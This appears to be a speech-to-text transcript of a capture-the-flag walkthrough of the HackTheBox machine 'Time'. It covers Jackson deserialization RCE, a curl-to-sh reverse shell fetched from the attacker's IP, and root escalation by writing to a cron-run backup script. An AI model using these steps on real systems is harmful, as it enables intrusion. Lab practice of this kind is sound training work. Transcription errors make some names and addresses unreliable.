Yo, what's up, guys? It's your Hacks, and today we'll be gonna be doing time from HackTheBox, and this is actually a pretty fun box. It's not that hard, but it's rated as a medium, and it's got some JavaScript and deserialization uh, challenge. So let's just get into it. So first, I'm gonna be doing a simple nmap. So nmap tag is v tag on. This outputs the nmap format, and I'm gonna store it in nmap initial, and the IP address of the box is, I'm just copying that. I've already run this, so we can see the results. And we see that there's two ports open, one port 22 and SSH, so HTTP. So we can go check that out. So booting up, yeah, and we can just check that like that. To the oh, looks like it just came. So we see we have an online JSON beautifier and validator. So we have got two options, beautify and validate. So validate seems to be beta, so we can just put some JSON. So don't know that much, sure, and then please sub. It's gonna beautify. So it looks like this works and beautifies JSON. So if we do any other plain text, it says null. Okay, now we can go into validate and see if we also validate. Should validate the JSON. So sure. Please sub. And you see it's taking a while, and we have this validation failed, so we can go check what that is. And we see unhandled Java exception. Java exception from faster XML Jackson data bind X mismatch. So it looks like it's here, Jackson data bind. Oh, that's, so we can copy that and try search for exploits. We see that there's some exploits. So we see remote code execution and fast XML, which is, we also got faster XML. So we know it could be remote code execution. So could do RCE exploit. We see some other stuff. I've already clicked on this one, but this one doesn't work. It says that it exploits this, running an exploit, but it doesn't actually work. So we can try for exploit maybe GitHub to see if there's any GitHub. Is Jackson data bind builds, do we? No, just doesn't look like it's gonna work. Jackson data bind. It's nice if it included. Yeah, we're gonna try fast XML. Yeah. listener. Exploit. Nope, not that. So we can try GitHub now, cause the exploits on GitHub, and we see that there's this Jackson RCE, and SSRF. So probably this is probably going to be exploiting it. So first it's saying simple HTTP server, and looks like it's going to be an SQL injection. So okay, so I believe that we host this in the server, and there's Ruby payload, and we see that this is probably going to be the payload, because we probably have to kind of use like Ruby, so we can I not copy that? Oh no, so we see that we got that, and let me just copy that into here. So we see we can go down here, and we can first maybe copy this into inject.sql. So it's saying it's basically creating a shell exec, and it's just using the command bash tag c. So and then it's saying call shell exec, so it's basically executing id, and we're going to put that in explorer.txt. We're going to be changing this and maybe get a reverse shell. So we can just sublime, let's make a dub directory and cd to dub, and we can sublime inject.sql, and I can paste this in here. Now we can just maybe get a reverse shell, maybe. So there's awesome website called reshnow.sh. So basically it's kind of like a reverse shell. So if we do our IP address 10.14.8, and our port that we want to connect to the user. I'm just gonna do 133.1.3.3.7, and we see that it actually provides us basically a shell, a bash. So we can just copy this whole thing. Let's copy this whole thing. Go back, and we can sublime maybe shell, and we can we can make the user the box our attacker to maybe curl this and execute it with sh. So it will first check if there's Python, and then it will execute this. So where's the store? Okay. So in inject.sql, what we can do is make them curl 10.14.8, and the name shell, and we can make this executable with sh. So it's basically gonna curl this and execute it with sh. So it's gonna execute this. So now what we can basically do is get the payload. First set up a netcat listener, and I'll do this. I'm gonna make a server here, so it's gonna be serving the dub, dub directory which has our inject.sql and shell. So now we can just netcat. If you guys know what PwnCat is, it's basically kind of like netcat, but it improves your connection. So it's basically like it's kind of like a metaproto shell. So I'll be using PwnCat, but you guys can use netcat, and it's pretty easy to download PwnCat too. So the port is 1337, and so now we just need to get the payload, and the payload is this. So this actually has curly these extra stuff. So if we echo it, echo somehow just manages to delete them. So here. So here we can just go back to the directory. So we have and so we can echo echo this, and just we have to change this to our IP address. So 10.10.14.8, and it just echoes the real payload. And now, so now we can go into the JSON parser and we can put this to validate, and we can paste this. So this may not work like the first time, because this also happened to me. Just the server doesn't really execute sometimes and executes the other time. So hopefully it executes correctly. So we can just do process. It looks like it's running. Yeah, we got the inject.sql. We got shell. So yep, we've got PwnCat ready, and we have Perculus. So we just run bash on this, and yeah, we're Perculus. So what you can do with PwnCat is like Control D, and we can upload stuff. So we can upload like the privilege escalation, whatever it's called. We can upload linps. Oh no, linps. So we can upload linps and linps.sh, and permission denied. Oh, maybe that's an error. So let's just go back, and we can see dev shm dev shm payload. What is this? Yeah, so this was what we put, and so it looks like the payload was stored in dev shm. So just gonna leave that, and I think I know why this is an error. So what I actually did is made linps executable. I don't think it's supposed to choose that, so is there any way yeah, so it looks like we just need to make another. What I can do is copy linps into HackTheBox, type and then time and dot data. So I can just let's see wget. Yeah, so I can just wget 10.10.14.8. What is it called? linps.sh, and we have linps, so we're going to chmod think we can execute in peace. Please don't say. Permission denied. Oh, I need to see. X. Now we probably can. So linpiece is gonna be running, and it should figure out how to exploit it. If it doesn't, we can probably we have to wait for this, right? Yep. So we see that there's a lot of stuff that linpiece is outputted. We can go to the top and slowly scroll down. So we see unwanted file system, useful software. Nothing really is interesting. 4 seconds ago. We should be if we go to find so we says sh files in path. You own this script. User bin timer backup.sh, and is root executing it or something? Files in handle. Oh yes, and there's the user.txt. I forgot to. So we know that there's this user bin timer backup.sh, so we can try that. So cd, okay, cd pericles ls, and there's user.txt. So we can probably see user bin backup.sh. So what it's doing is, yeah, looks like it is actually executing. So we do sudo tag l. I don't know the username. So it looks like root is actually executing this. So what we can do is we can make him either like connect to us with a reverse shell, or we can add our SSH keys. That's what I'm gonna do. So we can do, what is nano? So we can nano our SSH keys. So it's not writable. So if I do echo hi, oh yeah, it is. So let me just nano again. So it is writable. So we know that we can echo our SSH keys here. So we can probably make our SSH keys. So SSH keygen tag F, I believe. SSH keygen, just root time, just do root. So we see that, so we can get the root.pub and copy this. This to root.ssh authorized keys x y. So now we can let's tag LA on user bin timer sh. So the script actually executes every 8 seconds to date. There's no point because probably 8 seconds are done. So we can just do ssh tag I root at 10 or 10 or 10 dot 214, is that it? Yep, 214 and looks like it hasn't alien backsearch. No. Let's tag iron root at 10.10.10.214. No, so backup.sh. So root has actually done that, but looks like we did something wrong. So we can just maybe we need to echo. Yeah, we can just echo curl 10.10.14.8 shell sh into user bin timer backup.sh, and we need that Python 3 tag mhp dot server 80 and create a new one. Wait, let me just subble this one. Subble dub shell, so let me just subble that to 3. This is Python, so we should not be 3. So now we can concat tag port 133. Yep. Please Q, and this looks like it's the right syntax. And I believe we just wait on the connection. Shell, and we should be getting a shell any time now. 404. Oh no. Oh, we haven't double. So time server 80. Now this should be working. Do that again. Should apply, and we've got root. So that was a cd to root, and oh no, just lost that shell. Oh, it's got us again. So bash cd to root. Oh, why is this? So I think I know why. Okay, so ls root ls. So we have got root on time. So as I said earlier, this is a pretty easy box. Even though it's rated as medium over here, so I hope you guys like my video, and see you guys next time. See you. Bye.